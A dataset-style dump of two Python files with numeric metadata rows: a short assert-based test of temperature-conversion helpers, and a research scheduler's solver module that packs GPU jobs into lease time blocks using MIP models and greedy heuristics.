| 18.333333 | 26 | 0.518182 | 18 | 110 | 3.166667 | 0.5 | 0.140351 | 0.210526 | 0.421053 | 0.491228 | 0.491228 | 0 | 0 | 0 | 0 | 0 | 0 | 0.363636 | 110 | 5 | 27 | 22 | 0.814286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
93c78cd8f0eb6887c149f92ad5e051daf6abdfad | 167 | py | Python | python_2_modules/python_tester.py | chendaniely/2016-11-03-nsbe-workshop | 68cc68002ade2d91e9a9ea5659a65a68a4eb5bdb | [
"MIT"
] | null | null | null | python_2_modules/python_tester.py | chendaniely/2016-11-03-nsbe-workshop | 68cc68002ade2d91e9a9ea5659a65a68a4eb5bdb | [
"MIT"
] | null | null | null | python_2_modules/python_tester.py | chendaniely/2016-11-03-nsbe-workshop | 68cc68002ade2d91e9a9ea5659a65a68a4eb5bdb | [
"MIT"
] | null | null | null | import python_script as ps
# Smoke checks for the temperature-conversion helpers in python_script.
assert ps.c2f(0) == 32        # freezing point: Celsius -> Fahrenheit
assert ps.c2f(100) == 212     # boiling point: Celsius -> Fahrenheit
assert ps.k2c(273.15) == 0    # freezing point: Kelvin -> Celsius
assert ps.k2c(0) == -273.15   # absolute zero: Kelvin -> Celsius
assert ps.k2f(273.15) == 32   # freezing point: Kelvin -> Fahrenheit
| 16.7 | 28 | 0.634731 | 33 | 167 | 3.181818 | 0.454545 | 0.380952 | 0.209524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227586 | 0.131737 | 167 | 9 | 29 | 18.555556 | 0.496552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.833333 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
93ef5fb8caaade525a6585770c906fa1cce7c157 | 35,425 | py | Python | code/alg/scheduler/solver.py | S-Lab-System-Group/ChronusArtifact | bc7e15fefd53b80d1897170ab3c1aa7d353c3b79 | [
"MIT"
] | 7 | 2021-11-04T06:31:38.000Z | 2022-02-08T11:46:42.000Z | code/alg/scheduler/solver.py | S-Lab-System-Group/ChronusArtifact | bc7e15fefd53b80d1897170ab3c1aa7d353c3b79 | [
"MIT"
] | null | null | null | code/alg/scheduler/solver.py | S-Lab-System-Group/ChronusArtifact | bc7e15fefd53b80d1897170ab3c1aa7d353c3b79 | [
"MIT"
] | 1 | 2022-01-10T01:42:42.000Z | 2022-01-10T01:42:42.000Z | from mip import *
import numpy as np
import copy
import math
def compute_maximum_lease(expect_maximum_end_time, lease_time_interval, cur_lease_index):
    """Number of whole lease intervals left before the expected deadline.

    The deadline is truncated to complete intervals (floor — a ceil variant
    was considered but is not used), then the leases already consumed
    (``cur_lease_index``) are subtracted.
    """
    total_leases = math.floor(expect_maximum_end_time / lease_time_interval)
    return total_leases - cur_lease_index
def compute_emergence(expected_remaining_time, true_remaining_time, required_gpu_num):
    """Urgency score of a job: the negated outstanding GPU-time.

    NOTE(review): only ``true_remaining_time`` participates today;
    ``expected_remaining_time`` is accepted for interface compatibility
    (alternative scorings using it appear to have been tried and dropped).
    """
    outstanding_gpu_time = true_remaining_time * required_gpu_num
    return -outstanding_gpu_time
class NoPreemptMIPSolver(object):
    """Greedy feasibility checks for non-preemptible lease scheduling.

    ``solution[t]`` tracks the resources still free in future time block
    ``t``; jobs are packed latest-block-first so earlier blocks stay free
    for newly arriving jobs.

    This revision removes unreachable ``if False:`` branches, the no-op
    ``if True:`` wrappers, and a redundant trailing ``feasible = True``
    (all dead code in the original) — behavior is unchanged.
    """

    def __init__(self, method):
        # Strategy tag, kept for interface parity with the MIP solvers.
        self.method = method

    def batch_fast_check_if_packable(self, required_resource_list, required_block_list, maximum_block_list, existing_solution, resource_num_list):
        """Greedily pack all jobs; return (feasible, leftover_per_block).

        Job i needs required_resource_list[i] resources in
        required_block_list[i] of its first maximum_block_list[i] blocks.
        """
        if len(maximum_block_list) == 0:
            return True, copy.deepcopy(existing_solution)
        maximum_block = max(maximum_block_list)
        # Start from the existing plan, topping up with full capacity for
        # blocks the plan does not cover yet.
        solution = list()
        for i in range(maximum_block):
            if i < len(existing_solution):
                solution.append(existing_solution[i])
            else:
                solution.append(resource_num_list[i])
        resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
        # Tightest jobs (least slack between deadline and demand) first.
        resource_tuple_list.sort(key=lambda e: (e[0]-e[1], e[1], e[2]))
        for maximum_block, required_block, required_resource in resource_tuple_list:
            feasible, cnt = False, 0
            # Fill from the latest admissible block backwards.
            for i in range(maximum_block - 1, -1, -1):
                if solution[i] >= required_resource:
                    cnt += 1
                    solution[i] -= required_resource
                    if cnt == required_block:
                        feasible = True
                        break
            if not feasible: break
        return feasible, solution

    def batch_fast_job_selection(self, required_resource_list, required_block_list, maximum_block_list, existing_solution, resource_num_list):
        """Like batch_fast_check_if_packable, but also record placements.

        Returns (feasible, solution_matrix) where solution_matrix[i] is the
        0/1 block-occupancy vector of job i (1 == job runs in that block).
        """
        if len(maximum_block_list) == 0:
            return True, list()
        maximum_block = max(maximum_block_list)
        solution = list()
        for i in range(maximum_block):
            if i < len(existing_solution):
                solution.append(existing_solution[i])
            else:
                solution.append(resource_num_list[i])
        # Seeded with job indices; each entry is replaced by that job's
        # occupancy vector once it is placed.
        solution_matrix = [i for i in range(len(maximum_block_list))]
        resource_tuple_list = [(a, b, c, i) for a, b, c, i in zip(maximum_block_list, required_block_list, required_resource_list, solution_matrix)]
        # Tightest jobs first, same order as the feasibility check.
        resource_tuple_list.sort(key=lambda e: (e[0]-e[1], e[1], e[2]))
        for maximum_block, required_block, required_resource, idx in resource_tuple_list:
            feasible, cnt = False, 0
            cache_solution = [0 for _ in range(maximum_block)]
            for i in range(maximum_block - 1, -1, -1):
                if solution[i] >= required_resource:
                    cnt += 1
                    solution[i] -= required_resource
                    cache_solution[i] = 1
                    if cnt == required_block:
                        feasible = True
                        break
            if not feasible: break
            solution_matrix[idx] = cache_solution
        return feasible, solution_matrix
class MIPSolver(object):
    """Lease scheduling solver with exact (MIP) and greedy packing paths.

    A job asks for ``required_resource`` resources in ``required_block`` of
    its next ``maximum_block`` time blocks.  ``check_if_packable`` answers
    feasibility; ``job_selection`` solves a selection MIP over job variants
    ("soft" alternatives of the same job).

    Fixes in this revision (behavior-compatible):
      * knapsack leftover computation indexed ``resource_num_list`` with the
        list itself (a guaranteed TypeError) — now indexed by block id;
      * a leftover ``import pdb; pdb.set_trace()`` debugging hook was
        removed from ``batch_fast_job_selection``.
    """

    def __init__(self, method):
        # Packing strategy tag ('knapsack' / 'greedy' / 'greedy-smooth'
        # accepted by check_if_packable).
        self.method = method

    def check_if_packable(self, required_resource_list, required_block_list, maximum_block_list, resource_num_list, method):
        """Check whether every job fits within the per-block capacity.

        Returns (feasible, solution) where solution[t] is the capacity left
        in block t after packing.
        """
        if method == 'knapsack':
            # Exact 0/1 model: X[i*maximum_block + t] == 1 iff job i runs in
            # time block t.  The objective is a dummy (pure feasibility).
            maximum_block = max(maximum_block_list)
            m = Model(solver_name=GRB)
            var_len = len(required_resource_list) * maximum_block
            X = [m.add_var(var_type=BINARY) for i in range(len(required_resource_list) * maximum_block)]
            m.objective = maximize(X[-1])
            # job-wise: each job occupies exactly its required number of
            # blocks, and none beyond its own deadline.
            for i in range(len(required_resource_list)):
                m += xsum(X[j] for j in range(i * maximum_block, i * maximum_block + maximum_block_list[i])) == required_block_list[i]
                if maximum_block_list[i] < maximum_block:
                    m += xsum(X[j] for j in range(i * maximum_block + maximum_block_list[i], (i+1) * maximum_block)) == 0
            # resource-wise: per-block capacity limit.
            for i in range(maximum_block):
                m += xsum(X[j] * required_resource_list[j // maximum_block] for j in range(i, var_len, maximum_block) ) <= resource_num_list[i]
            m.optimize()
            feasible = not any([X[i].x is None for i in range(var_len)])
            solution = list()
            if feasible:
                for block_idx in range(maximum_block):
                    # BUGFIX: was resource_num_list[resource_num_list],
                    # which raises TypeError; index by the block id.
                    left_resource_num = resource_num_list[block_idx]
                    for var_idx in range(block_idx, var_len, maximum_block):
                        left_resource_num -= X[var_idx].x * required_resource_list[var_idx // maximum_block]
                    solution.append(left_resource_num)
        elif method == 'greedy':
            maximum_block = max(maximum_block_list)
            solution = [resource_num_list[i] for i in range(maximum_block)]
            resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
            # Largest (deadline, blocks, demand) triples first.
            resource_tuple_list.sort(reverse=True)
            for maximum_block, required_block, required_resource in resource_tuple_list:
                feasible, cnt = False, 0
                # Fill from the latest admissible block backwards.
                for i in range(maximum_block - 1, -1, -1):
                    if solution[i] >= required_resource:
                        cnt += 1
                        solution[i] -= required_resource
                        if cnt == required_block:
                            feasible = True
                            break
                if not feasible: break
        elif method == 'greedy-smooth':
            maximum_block = max(maximum_block_list)
            solution = [resource_num_list[i] for i in range(maximum_block)]
            resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
            # Tightest jobs first, then later deadlines, then bigger demand.
            resource_tuple_list.sort(key=lambda e: (e[0] - e[1], -e[0], -e[2]))
            for maximum_block, required_block, required_resource in resource_tuple_list:
                feasible, cnt = False, 0
                # Prefer the latest blocks to smooth out utilization.
                idx_resource_pair = sorted([(idx, resource) for idx, resource in enumerate(solution)], key=lambda e: (e[0], e[1]), reverse=True)
                for idx, resource in idx_resource_pair:
                    if idx < maximum_block and resource >= required_resource:
                        cnt += 1
                        solution[idx] -= required_resource
                        if cnt == required_block:
                            feasible = True
                            break
                if not feasible: break
        return feasible, solution

    def fast_check_if_packable(self, required_resource, required_block, maximum_block, existing_solution, resource_num_list):
        """Greedily try to add one job to an existing packing plan.

        Mutates ``existing_solution`` in place (padding it to
        ``maximum_block`` entries) and returns (feasible, plan).
        """
        if required_block > maximum_block: return False, existing_solution
        feasible_block = 0
        if len(existing_solution) < maximum_block:
            existing_solution += [resource_num_list[i] for i in range(len(existing_solution), maximum_block)]
        # Count blocks with enough headroom for this job.
        for i in range(maximum_block):
            if existing_solution[i] >= required_resource:
                feasible_block += 1
        feasible = feasible_block >= required_block
        if feasible:
            # Commit the job to the latest blocks with enough headroom.
            for i in range(maximum_block - 1, -1, -1):
                if existing_solution[i] >= required_resource and required_block > 0:
                    existing_solution[i] -= required_resource
                    required_block -= 1
        return feasible, existing_solution

    def fast_job_cache_solution(self, required_resource_list, required_block_list, maximum_block_list,
                                existing_solution, resource_num_list):
        """Place the LAST listed job first (recording its blocks), then
        re-pack the remaining jobs greedily.

        Returns (feasible, leftover_per_block, cache_solution) where
        cache_solution is the 0/1 block-occupancy vector of the last job,
        or (False, None, None) when packing fails.
        """
        if len(maximum_block_list) == 0:
            return True, copy.deepcopy(existing_solution), None
        maximum_block = max(maximum_block_list)
        solution = list()
        for i in range(maximum_block):
            if i < len(existing_solution):
                solution.append(existing_solution[i])
            else:
                solution.append(resource_num_list[i])
        required_resource, required_block, maximum_block = required_resource_list[-1], required_block_list[-1], maximum_block_list[-1]
        # Place the newly added (last) job, remembering which blocks it got.
        cache_solution = [0 for _ in range(maximum_block)]
        feasible, cnt = False, 0
        for i in range(maximum_block - 1, -1, -1):
            if solution[i] >= required_resource:
                cnt += 1
                solution[i] -= required_resource
                cache_solution[i] = 1
                if cnt == required_block:
                    feasible = True
                    break
        if not feasible:
            return feasible, None, None
        required_resource_list, required_block_list, maximum_block_list = required_resource_list[:-1], required_block_list[:-1], maximum_block_list[:-1]
        resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
        # Biggest demand first, then tightest slack, then latest deadline.
        resource_tuple_list.sort(key=lambda e: (-e[2], e[0] - e[1], -e[0]))
        for maximum_block, required_block, required_resource in resource_tuple_list:
            feasible, cnt = False, 0
            for i in range(maximum_block - 1, -1, -1):
                if solution[i] >= required_resource:
                    cnt += 1
                    solution[i] -= required_resource
                    if cnt == required_block:
                        feasible = True
                        break
            if not feasible: break
        return feasible, solution, cache_solution

    def batch_fast_check_if_packable(self, soft_list, value_list, soft_id_list, required_resource_list, required_block_list, maximum_block_list, in_block_list, existing_solution, resource_num_list):
        """Greedy feasibility check over job variants.

        ``in_block_list`` carries the job dicts; only the first variant of
        each 'job_id' encountered (after sorting) is packed.
        """
        if len(maximum_block_list) == 0:
            return True, copy.deepcopy(existing_solution)
        maximum_block = max(maximum_block_list)
        solution = list()
        for i in range(maximum_block):
            if i < len(existing_solution):
                solution.append(existing_solution[i])
            else:
                solution.append(resource_num_list[i])
        resource_tuple_list = [(a, b, c, job) for a, b, c, job in zip(maximum_block_list, required_block_list, required_resource_list, in_block_list)]
        # Biggest demand first, then tightest slack, then latest deadline.
        resource_tuple_list.sort(key=lambda e: (-e[2], e[0] - e[1], -e[0]))
        visit_list = list()
        for maximum_block, required_block, required_resource, job in resource_tuple_list:
            # Pack each job only once across its variants.
            if job['job_id'] not in visit_list:
                visit_list.append(job['job_id'])
            else:
                continue
            feasible, cnt = False, 0
            for i in range(maximum_block - 1, -1, -1):
                if solution[i] >= required_resource:
                    cnt += 1
                    solution[i] -= required_resource
                    if cnt == required_block:
                        feasible = True
                        break
            if not feasible: break
        return feasible, solution

    def batch_fast_job_selection(self, soft_list, value_list, soft_id_list, required_resource_list, required_block_list, maximum_block_list, in_block_list, existing_solution, resource_num_list):
        """Greedy variant selection.

        Returns (feasible, solution_matrix, soft_matrix): one 0/1 block
        vector per variant plus a 0/1 flag marking the chosen variant of
        each job.  Fails with (False, [], []) if some job ends up with no
        placed variant.
        """
        if len(maximum_block_list) == 0:
            return True, list(), list()
        maximum_block = max(maximum_block_list)
        solution = list()
        for i in range(maximum_block):
            if i < len(existing_solution):
                solution.append(existing_solution[i])
            else:
                solution.append(resource_num_list[i])
        solution_matrix = [i for i in range(len(maximum_block_list))]
        soft_matrix = [0 for i in range(len(maximum_block_list))]
        resource_tuple_list = [(a, b, c, i, soft_id, value, job) for a, b, c, i, soft_id, value, job in zip(maximum_block_list, required_block_list, required_resource_list, solution_matrix, soft_id_list, value_list, in_block_list)]
        # Highest value first, then biggest demand, then tightest slack.
        resource_tuple_list.sort(key=lambda e: (-e[-2], -e[2], e[0] - e[1], -e[0]))
        visit_list = list()
        for maximum_block, required_block, required_resource, idx, soft_id, value, job in resource_tuple_list:
            if job['job_id'] in visit_list:
                continue
            feasible, cnt = False, 0
            cache_solution = [0 for _ in range(maximum_block)]
            for i in range(maximum_block - 1, -1, -1):
                if solution[i] >= required_resource:
                    cnt += 1
                    solution[i] -= required_resource
                    cache_solution[i] = 1
                    if cnt == required_block:
                        feasible = True
                        break
            if feasible:
                solution_matrix[idx] = cache_solution
                soft_matrix[idx] = 1
                visit_list.append(job['job_id'])
            if not feasible:
                # Roll back the partial allocation of this failed variant.
                for i in range(maximum_block - 1, -1, -1):
                    if cache_solution[i] == 1:
                        solution[i] += required_resource
        for job in in_block_list:
            if job['job_id'] not in visit_list:
                # BUGFIX: removed leftover `import pdb; pdb.set_trace()`
                # debugging hook that would hang a production run here.
                return False, list(), list()
        return feasible, solution_matrix, soft_matrix

    def job_selection(self, soft_list, value_list, soft_id_list, required_resource_list, required_block_list, maximum_block_list, resource_num_list, objective, max_seconds=5):
        """Solve the job-selection MIP.

        S[i] selects variant i; X flattens (variant, block) placement.
        Variants belonging to the same soft group (groups are delimited by
        soft_id_list entries equal to 0) are mutually exclusive — exactly
        one per group is selected.  Returns (solution_matrix, soft_matrix).
        """
        max_resource_num = 1.0 * max(resource_num_list)
        maximum_block = max(maximum_block_list)
        if isinstance(resource_num_list, int):
            resource_num_list = [resource_num_list for _ in range(maximum_block)]
        m = Model(solver_name=GRB)
        var_len = len(required_resource_list) * maximum_block
        X = [m.add_var(var_type=BINARY) for i in range(len(required_resource_list) * maximum_block)]
        S = [m.add_var(var_type=BINARY) for i in range(len(required_resource_list))]
        # Base objective: the value of the selected variants.
        obj_list = [S[j] * value_list[j] for j in range(len(required_resource_list))]
        if objective == 'random':
            obj_list = [S[0] * value_list[0]]
        elif objective == 'minimize':
            # Penalize (normalized) resource usage in the first block.
            for j in range(0, var_len, maximum_block):
                obj_list.append(-X[j] * required_resource_list[j // maximum_block] / max_resource_num)
        elif objective == 'maximize':
            # Reward (normalized) resource usage in the first block.
            for j in range(0, var_len, maximum_block):
                obj_list.append(X[j] * required_resource_list[j // maximum_block] / max_resource_num)
        else:
            raise NotImplementedError
        m.objective = maximize(xsum(obj_list[i] for i in range(len(obj_list))))
        # job-wise: a selected variant occupies exactly its required blocks,
        # and none beyond its own deadline.
        for i in range(len(required_resource_list)):
            m += xsum(X[j] for j in range(i * maximum_block, i * maximum_block + maximum_block_list[i])) == S[i] * required_block_list[i]
            if maximum_block_list[i] < maximum_block:
                m += xsum(X[j] for j in range(i * maximum_block + maximum_block_list[i], (i+1) * maximum_block)) == 0
        # resource-wise: per-block capacity limit.
        for i in range(maximum_block):
            m += xsum(X[j] * required_resource_list[j // maximum_block] for j in range(i, var_len, maximum_block) ) <= resource_num_list[i]
        # Exactly one variant per soft group.
        i = 0
        while i < len(required_resource_list):
            if soft_id_list[i] != 0:
                i += 1
                continue
            left = i
            right = len(required_resource_list)
            for j in range(i+1, len(required_resource_list)):
                if soft_id_list[j] == 0:
                    right = j
                    break
            m += xsum(S[j] for j in range(left, right)) == 1
            i = right
        m.optimize(max_seconds=max_seconds, max_seconds_same_incumbent=1)
        # Extract 0/1 placements; the solver may report fractional epsilons,
        # so round at 0.5 (None means no incumbent was found).
        solution_matrix = list()
        for i in range(len(required_resource_list)):
            start = i * maximum_block
            solution = list()
            for j in range(start, start+maximum_block_list[i]):
                res = X[j].x
                if res is not None:
                    res = 0 if res < 0.5 else 1
                solution.append(res)
            solution_matrix.append(solution)
        soft_matrix = list()
        for i in range(len(soft_id_list)):
            soft_matrix.append(S[i].x)
        return solution_matrix, soft_matrix
class MIPSolverResourceUserConstrain(object):
    def __init__(self, method):
        # Packing strategy tag; check_if_packable accepts 'knapsack',
        # 'greedy', and 'greedy-smooth'.
        self.method = method
def check_if_packable(self, required_resource_list, required_block_list, maximum_block_list, resource_num_list, method):
if method == 'knapsack':
maximum_block = max(maximum_block_list)
m = Model(solver_name=GRB)
var_len = len(required_resource_list) * maximum_block
X = [m.add_var(var_type=BINARY) for i in range(len(required_resource_list) * maximum_block)]
m.objective = maximize(X[-1])
# job-wise
for i in range(len(required_resource_list)):
m += xsum(X[j] for j in range(i * maximum_block, i * maximum_block + maximum_block_list[i])) == required_block_list[i]
if maximum_block_list[i] < maximum_block:
m += xsum(X[j] for j in range(i * maximum_block + maximum_block_list[i], (i+1) * maximum_block)) == 0
# resource-wise
for i in range(maximum_block):
m += xsum(X[j] * required_resource_list[j // maximum_block] for j in range(i, var_len, maximum_block) ) <= resource_num_list[i]
m.optimize()
feasible = not any([X[i].x is None for i in range(var_len)])
solution = list()
if feasible:
for block_idx in range(maximum_block):
left_resource_num = resource_num_list[resource_num_list]
for var_idx in range(block_idx, var_len, maximum_block):
left_resource_num -= X[var_idx].x * required_resource_list[var_idx // maximum_block]
solution.append(left_resource_num)
elif method == 'greedy':
maximum_block = max(maximum_block_list)
solution = [resource_num_list[i] for i in range(maximum_block)]
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
resource_tuple_list.sort(reverse=True)
for maximum_block, required_block, required_resource in resource_tuple_list:
feasible, cnt = False, 0
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
elif method == 'greedy-smooth':
maximum_block = max(maximum_block_list)
solution = [resource_num_list[i] for i in range(maximum_block)]
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
resource_tuple_list.sort(key=lambda e: (-e[2], e[0] - e[1], -e[0]))
for maximum_block, required_block, required_resource in resource_tuple_list:
feasible, cnt = False, 0
# idx_resource_pair = sorted([(idx, resource) for idx, resource in enumerate(solution)], key=lambda e: (e[1], e[0]), reverse=True)
idx_resource_pair = sorted([(idx, resource) for idx, resource in enumerate(solution)], key=lambda e: (e[0], e[1]), reverse=True)
for idx, resource in idx_resource_pair:
if idx < maximum_block and resource >= required_resource:
cnt += 1
solution[idx] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
return feasible, solution
def fast_check_if_packable(self, required_resource, required_block, maximum_block, existing_solution, resource_num_list):
if required_block > maximum_block: return False, existing_solution
feasible_block = 0
if len(existing_solution) < maximum_block:
existing_solution += [resource_num_list[i] for i in range(len(existing_solution), maximum_block)]
for i in range(maximum_block):
if existing_solution[i] >= required_resource:
feasible_block += 1
feasible = feasible_block >= required_block
if feasible:
for i in range(maximum_block - 1, -1, -1):
if existing_solution[i] >= required_resource and required_block > 0:
existing_solution[i] -= required_resource
required_block -= 1
return feasible, existing_solution
def batch_fast_check_if_packable(self, required_resource_dict, required_block_dict, maximum_block_dict, existing_solution_dict, resource_num_dict, user_list):
solution = dict()
for user in user_list:
required_resource_list = required_resource_dict[user]
required_block_list = required_block_dict[user]
maximum_block_list = maximum_block_dict[user]
existing_solution = existing_solution_dict[user]
resource_num_list = resource_num_dict[user]
solution[user] = list()
if len(maximum_block_list) == 0:
feasible = True
solution[user] = copy.deepcopy(existing_solution)
continue
maximum_block = max(maximum_block_list)
for i in range(maximum_block):
if i < len(existing_solution):
solution[user].append(existing_solution[i])
else:
solution[user].append(resource_num_list[i])
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
# resource_tuple_list.sort(key=lambda e: (-e[2], e[0] - e[1], -e[0]))
resource_tuple_list.sort(key=lambda e: (e[0], e[0] - e[1], e[2]))
for maximum_block, required_block, required_resource in resource_tuple_list:
feasible, cnt = False, 0
for i in range(maximum_block - 1, -1, -1):
if solution[user][i] >= required_resource:
cnt += 1
solution[user][i] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
if not feasible:
solution = None
break
return feasible, solution
def batch_fast_job_selection(self, required_resource_dict, required_block_dict, maximum_block_dict, existing_solution_dict, resource_num_dict, user_list):
base_idx = 0
solution_matrix = list()
for user in user_list:
required_resource_list = required_resource_dict[user]
required_block_list = required_block_dict[user]
maximum_block_list = maximum_block_dict[user]
existing_solution = existing_solution_dict[user]
resource_num_list = resource_num_dict[user]
if len(maximum_block_list) == 0:
feasible = True
continue
maximum_block = max(maximum_block_list)
solution = list()
for i in range(maximum_block):
if i < len(existing_solution):
solution.append(existing_solution[i])
else:
solution.append(resource_num_list[i])
idx_list = [i for i in range(len(maximum_block_list))]
solution_matrix = solution_matrix + idx_list
resource_tuple_list = [(a, b, c, i) for a, b, c, i in zip(maximum_block_list, required_block_list, required_resource_list, idx_list)]
resource_tuple_list.sort(key=lambda e: ( -e[2], e[0] - e[1], -e[0]))
for maximum_block, required_block, required_resource, idx in resource_tuple_list:
feasible, cnt = False, 0
cache_solution = [0 for _ in range(maximum_block)]
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
cache_solution[i] = 1
if cnt == required_block:
feasible = True
break
solution_matrix[idx + base_idx] = cache_solution
if not feasible: break
base_idx += len(resource_tuple_list)
if not feasible:
break
return feasible, solution_matrix
# Jointly select jobs for all users with a mixed-integer program
# (python-mip, Gurobi backend): one binary variable per (job, time-block)
# pair, per-job block-count constraints, and per-block resource
# constraints.  NOTE: the source indentation of this block was lost
# upstream; comments below annotate the flattened statements in order.
def job_selection(self, required_resource_dict, required_block_dict, maximum_block_dict, resource_num_dict, user_list, objective, max_seconds=5):
# Flatten every user's job lists into single global lists.
required_block_list = list()
maximum_block_list = list()
required_resource_list = list()
for user in user_list:
if len(required_resource_dict[user]) > 0:
required_block_list += required_block_dict[user]
maximum_block_list += maximum_block_dict[user]
required_resource_list += required_resource_dict[user]
maximum_block = max(maximum_block_list)
# NOTE(review): ``resource_num_list`` is read here but never assigned in
# this function (the parameter is ``resource_num_dict``) -- as written this
# raises NameError; confirm the intended source of per-block capacities.
if isinstance(resource_num_list, int):
resource_num_list = [resource_num_list for _ in range(maximum_block)]
m = Model(solver_name=GRB)
# One binary decision variable per (job, block) pair.
var_len = len(maximum_block_list) * maximum_block
X = [m.add_var(var_type=BINARY) for i in range(len(maximum_block_list) * maximum_block)]
if objective == 'random':
m.objective = maximize(X[-1])
elif objective == 'minimize':
# Minimize total selected resource (expressed as a negated maximization).
m.objective = maximize(-xsum(X[j] * required_resource_list[j // maximum_block] for j in range(0, var_len, maximum_block)) )
elif objective == 'maximize':
m.objective = maximize(xsum(X[j] * required_resource_list[j // maximum_block] for j in range(0, var_len, maximum_block)) )
else:
raise NotImplementedError
# time-wise
# Each job must occupy exactly ``required_block_list[i]`` blocks, and no
# block past its ``maximum_block_list[i]`` limit.
for i in range(len(required_resource_list)):
m += xsum(X[j] for j in range(i * maximum_block, i * maximum_block + maximum_block_list[i])) == required_block_list[i]
if maximum_block_list[i] < maximum_block:
m += xsum(X[j] for j in range(i * maximum_block + maximum_block_list[i], (i+1) * maximum_block)) == 0
# resource-wise
# For each block, cap the summed demand of each user's jobs.
for i in range(maximum_block):
base_j = 0
for user in user_list:
bottom = i + maximum_block * base_j
# NOTE(review): ``top`` adds ``base_j`` into both ends of the range,
# so the window size depends on ``base_j`` -- verify this offset math.
top = bottom + maximum_block * (base_j + len(required_resource_dict[user]) + 1)
# NOTE(review): the right-hand side reads ``required_resource_dict``
# (per-job demands) rather than ``resource_num_dict`` (per-block
# capacity) -- confirm which is intended as the capacity bound.
m += xsum(X[j] * required_resource_list[j // maximum_block] for j in range(bottom, top, maximum_block) ) <= required_resource_dict[user][i]
base_j += len(required_resource_dict[user])
m.optimize(max_seconds=max_seconds)
# Read back one 0/1-ish selection list per job.
solution_matrix = list()
for i in range(len(required_resource_list)):
start = i * maximum_block
solution = list()
for j in range(start, start+maximum_block_list[i]):
res = X[j].x
if res is not None:
res = 0 if res < 0.5 else 1
# NOTE(review): the rounded ``res`` is discarded and the raw (possibly
# fractional) variable value is appended; the sibling solver below
# appends ``res`` instead -- likely the intent here too.
solution.append(X[j].x)
solution_matrix.append(solution)
return solution_matrix
class SemiPreemptMIPSolver(object):
    """Greedy first-fit scheduler for semi-preemptible jobs.

    ``job_selection`` places each job into the first contiguous window of
    ``required_block`` blocks (ending no later than the job's
    ``maximum_block``) whose remaining per-block capacity covers the job's
    resource demand.

    Note: the original implementation carried a MIP formulation after an
    unconditional ``if True: ... return`` -- that branch was unreachable
    and has been removed.  ``reward_list`` and ``max_seconds`` are kept in
    the signature for interface compatibility even though the greedy
    strategy does not consult them.
    """

    def __init__(self, method):
        # ``method`` is stored but not consulted by ``job_selection``.
        self.method = method

    def job_selection(self, required_resource_list, required_block_list, maximum_block_list, reward_list, existing_solution, resource_num_list, max_seconds=10):
        """Assign each job a contiguous run of blocks, first-fit.

        Args:
            required_resource_list: resource demand per job.
            required_block_list: contiguous blocks needed per job.
            maximum_block_list: exclusive upper bound on each job's window
                end (window ends range up to this value).
            reward_list: unused by the greedy strategy.
            existing_solution: remaining capacity of blocks already in use;
                blocks beyond its length use ``resource_num_list``.
            resource_num_list: full capacity per block.
            max_seconds: unused by the greedy strategy.

        Returns:
            One entry per job: a 0/1 list of length ``maximum_block_list[i]``
            marking the claimed blocks, or ``None`` when no feasible window
            exists for that job.
        """
        if len(maximum_block_list) == 0:
            return list()
        maximum_block = max(maximum_block_list)
        # Remaining capacity per block: already-started blocks first, the
        # rest at full capacity.
        capacity = list()
        for i in range(maximum_block):
            if i < len(existing_solution):
                capacity.append(existing_solution[i])
            else:
                capacity.append(resource_num_list[i])
        solution_matrix = list()
        for i in range(len(required_resource_list)):
            sol = None
            # Slide a window of required_block_list[i] blocks; its end j
            # ranges from the earliest possible up to maximum_block_list[i].
            for j in range(required_block_list[i], maximum_block_list[i] + 1):
                left = j - required_block_list[i]
                right = left + required_block_list[i]
                done = True
                for k in range(left, right):
                    if capacity[k] < required_resource_list[i]:
                        done = False
                if done:
                    sol = [0 for _ in range(maximum_block_list[i])]
                    for k in range(left, right):
                        sol[k] = 1
                        capacity[k] -= required_resource_list[i]
                    break
            solution_matrix.append(sol)
        return solution_matrix
